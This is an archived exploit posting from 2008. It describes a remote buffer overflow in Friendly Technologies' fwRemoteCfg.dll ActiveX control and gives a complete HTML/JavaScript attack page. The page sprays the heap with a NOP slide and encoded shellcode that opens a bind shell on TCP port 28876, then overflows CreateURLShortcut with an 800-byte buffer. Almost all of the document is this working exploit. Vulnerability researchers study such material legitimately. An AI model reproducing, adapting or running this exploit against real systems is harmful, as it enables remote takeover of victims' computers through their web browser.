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friendly-fwremotecfg.txt

friendly-fwremotecfg.txt
Posted Aug 29, 2008
Authored by spdr

Friendly Technologies Active-X remote buffer overflow exploit that leverages fwRemoteCfg.dll.

tags | exploit, remote, overflow, activex
MD5 | 89e10b34b9b9cc0ea532944e20fc1f6f

friendly-fwremotecfg.txt

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"Friendly Technologies" provide software like L2TP and PPPoE clients to ISPs,
who give the software to their customers on CD so they have less trouble setting up thire connections.
They also provide remote configuration solutions .. not the best idea if you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B" id="sucker"></object>
<input type="button" value="Exploit!" onClick="exploit()">

<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode = unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE, hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of blocks

spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide


// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k++)
memory[k] = spraySlide + ShellCode;

// Create Evil Buffer
while(Evil.length < 800)
Evil += "A";
Evil += DamnIE;

// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as filename, we dont really want to make a file.
}

function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide += spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>

</html>

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